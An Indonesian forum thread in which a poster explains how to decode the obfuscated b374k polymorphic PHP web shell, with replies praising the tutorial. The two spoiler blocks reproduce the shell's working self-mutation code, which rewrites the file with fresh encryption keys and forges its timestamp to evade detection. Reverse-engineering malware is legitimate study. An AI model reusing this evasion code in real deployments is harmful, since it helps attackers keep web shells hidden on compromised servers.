[Tutor] Jalan terang decode b374k polymorphic

[mariachi]

Selama ini banyak yang menanyakan bagaimana cara decode shell b374k polymorphic, soalnya shell buatan om ketek tersebut emang susah banget untuk di decode. Banyak yang mencoba melakukan decoding b374k dan hasilnya hanya berupa angka2 ga jelas. Saya juga sempat mengalami hal yang sama ketika pertama kali melakukan decode shell tersebut. Tapi saya tidak putus asa, dan terus mencoba berbagai cara untuk melakukan decoding terhadap shell tersebut. Hasilnya pun tidak sia-sia, akhirnya shellnya pun berhasil terbuka. Berikut langkah-langkah yang saya lakukan untuk mendecode shell b374k :
1. Kita buka shell b374k polymorphic yang sudah di download
2. Lihat pada baris kode berikut :
eval(gzinflate(base64_decode(shell_code_nya);
dari kode diatas kita dapat melakukan decode dengan menyimpan hasil decode ke dalam sebuah variabel dan menghilangkan code eval() agar shell tidak tereksekusi.
Contoh (bongkar.php):

PHP Code:

$shell_code=”copy_shell_disini”;
$bantai=gzinflate(base64_decode($shell_code));
$file=fopen("bongkar.txt","a");
fputs($file,$bantai);
fclose($file);
echo ("berhasil !!!!"); 


3. Jalankan script bongkar.php kemudian Buka file bongkar.txt yang ada di folder tempat anda menyimpan script bongkar.php, anda akan melihat hasil decode dari shell b374k. akan tetapi anda pasti akan merasa heran, kenapa hasil decodenya belum terlihat seperti script php pada umumnya?. Tenang saja, shell ini memang di encode sebanyak 2 kali, tujuannya tentu saja untuk polymorphic tadi. Nanti akan saya jelaskan fungsi untuk polymorphicnya.
4. Pada file bongkar.txt anda akan melihat 2 variabel yaitu $x070cd7ad dan $xa7c119b3. Lakukan decoding terhadap variabel kedua. maka anda akan melihat script untuk merandom file shell agar tidak mudah terdeteksi (fungsi polymorphic). sedangkan variabel pertama adalah script shell sesungguhnya.

Spoiler:

PHP Code:

function love($me,$you){
    $progress = NULL;
    for($kiss = 0; $kiss < strlen($me); $kiss += strlen($you)){
        for($hug = 0; $hug < strlen($you); $hug++){
            $past = (int) ord(substr($me, $kiss+$hug, 1));
            $present = (int) ord(substr($you, $hug, 1));
            $sweet = $past + $present;
            $progress .= $sweet . ".";
        }
    }
    return base64_encode(gzdeflate(rtrim($progress, "."), 9));
}
function hate($me,$you){
    $progress = NULL;
    $problems = explode(".", gzinflate(base64_decode($me)));
    for($mistake = 0; $mistake < count($problems); $mistake += strlen($you)){
        for($hug = 0; $hug < strlen($you); $hug++){
            $past = (int) $problems[$mistake+$hug];
            $present = (int) ord(substr($you, $hug, 1));
            
            $sweet = $past - $present;
            $progress .= chr($sweet);
        }
    }
    return $progress;
}
function make_love(){
    $man = "man.".time().rand(0,50);
    $woman = "woman".time().rand(51,100);
    return "x" . substr(md5($man.$woman),0,8);
}
function rebirth(){
    $parent = basename($_SERVER['PHP_SELF']);
    $egg = file_get_contents($parent);
    $eggdate = filemtime($parent);

    $checkup = preg_match_all("/\"([^\"]*)\"/", $egg, $eggs);
    $egg = gzinflate(base64_decode($eggs[1][0]));


    $get_embrio = preg_match_all("/\"([^\"]*)\"/", $egg, $eggs);
    $adam = $eggs[1][0];
    $one = make_love();
    $embrio = $eggs[1][1];
    $two = make_love();
    $eve = $eggs[1][2];
    $three = make_love();

    $thepass = $eggs[1][3];
    
    $before = hate($adam, $eve);
    $after = love($before, $three);


    $child = "\$" . $one . " = \"" . $after . "\";" .
         "\$" . $two . " = \"" . $embrio . "\";" .
         "\$" . $three . " = \"" . $three . "\";" .
         "\$s_pass = \"" . $thepass ."\";" .
         "eval(gzinflate(base64_decode(\$" . $two . ")));" .
         "rebirth();" .
         "eval(gzinflate(base64_decode(hate(\$". $one . ",\$" . $three . "))));";

    $child = base64_encode(gzdeflate($child,9));
    $child = "<?php eval(gzinflate(base64_decode(\"" . $child . "\"))); ?>"; if(!$any = getenv("TMP")) if(!$any = getenv("TEMP")) if(!$any = getenv("TMPDIR")){ if(is_writable("/tmp")) $any = "/tmp/"; else $any = "."; } if(file_put_contents($any . $three, $child)){ rename($any . $three , $parent); touch($parent, $eggdate); if(is_file($any . $three)) unlink($any . $three); } } 


5. lakukan decode terhadap variabel pertama yang berisi script shell yang sebenarnya seperti ini :

Spoiler:

PHP Code:

$x070cd7ad ="isi_shell_nya";
function love($me,$you){
    $progress = NULL;
    for($kiss = 0; $kiss < strlen($me); $kiss += strlen($you)){
        for($hug = 0; $hug < strlen($you); $hug++){
            $past = (int) ord(substr($me, $kiss+$hug, 1));
            $present = (int) ord(substr($you, $hug, 1));
            $sweet = $past + $present;
            $progress .= $sweet . ".";
        }
    }
    return base64_encode(gzdeflate(rtrim($progress, "."), 9));
}
function hate($me,$you){
    $progress = NULL;
    $problems = explode(".", gzinflate(base64_decode($me)));
    for($mistake = 0; $mistake < count($problems); $mistake += strlen($you)){
        for($hug = 0; $hug < strlen($you); $hug++){
            $past = (int) $problems[$mistake+$hug];
            $present = (int) ord(substr($you, $hug, 1));
            
            $sweet = $past - $present;
            $progress .= chr($sweet);
        }
    }
    return $progress;
}
function make_love(){
    $man = "man.".time().rand(0,50);
    $woman = "woman".time().rand(51,100);
    return "x" . substr(md5($man.$woman),0,8);
}
function rebirth(){
    $parent = basename($_SERVER['PHP_SELF']);
    $egg = file_get_contents($parent);
    $eggdate = filemtime($parent);

    $checkup = preg_match_all("/\"([^\"]*)\"/", $egg, $eggs);
    $egg = gzinflate(base64_decode($eggs[1][0]));


    $get_embrio = preg_match_all("/\"([^\"]*)\"/", $egg, $eggs);
    $adam = $eggs[1][0];
    $one = make_love();
    $embrio = $eggs[1][1];
    $two = make_love();
    $eve = $eggs[1][2];
    $three = make_love();

    $thepass = $eggs[1][3];
    
    $before = hate($adam, $eve);
    $after = love($before, $three);


    $child = "\$" . $one . " = \"" . $after . "\";" .
         "\$" . $two . " = \"" . $embrio . "\";" .
         "\$" . $three . " = \"" . $three . "\";" .
         "\$s_pass = \"" . $thepass ."\";" .
         "eval(gzinflate(base64_decode(\$" . $two . ")));" .
         "rebirth();" .
         "eval(gzinflate(base64_decode(hate(\$". $one . ",\$" . $three . "))));";

    $child = base64_encode(gzdeflate($child,9));
    $child = "<?php eval(gzinflate(base64_decode(\"" . $child . "\"))); ?>"; if(!$any = getenv("TMP")) if(!$any = getenv("TEMP")) if(!$any = getenv("TMPDIR")){ if(is_writable("/tmp")) $any = "/tmp/"; else $any = "."; } if(file_put_contents($any . $three, $child)){ rename($any . $three , $parent); touch($parent, $eggdate); if(is_file($any . $three)) unlink($any . $three); } } 
$x2d60ef22 = "x2d60ef22";
//tanpa fungsi rebirth();
$bantai2=gzinflate(base64_decode(hate($x070cd7ad,$x2d60ef22)));
$file=fopen("becak.txt","a");
fputs($file,$bantai2);
fclose($file);
echo ("berhasil !!!!");
?>

6. buka file becak.txt, maka anda akan mendapatkan shell b374k polymorphic yang sudah di decode (edit biar mudah dibaca). setelah di edit anda akan melihat ribuan baris code yang membingungkan (eh... itu mah saya deng hehe), om ketek emang hebat banget bikin shell aja ampe ribuan baris code

saya semata-mata hanya ingin belajar, tidak bermaksud untuk hal-hal negatfil lainnya. silahkan hubungi om ketek untuk mengetahui penjelasan tentang script diatas.

semoga membantu !!!

[KataM]

omz pinter ,, ajarin ane privete ya

[chaer.newbie]

kwkwkwkwkw ganteng

[Vanzoel]

Keren,,,

[Eyang Subur]

Heker nih... ijin coba om

[c0d3HitLER]

ini baru jelas
ketemu dh titik terangnya
Makasih om, siap mencoba

[Eyang Subur]

kalo shellnya si james bisa ndak ya?

I can try it

[~c()k3~]

wowwwwwww

[Neo]

love u full dahh..

[selfdefense]

om nya heker nih....
ikut belajar ah.... makasih banget om...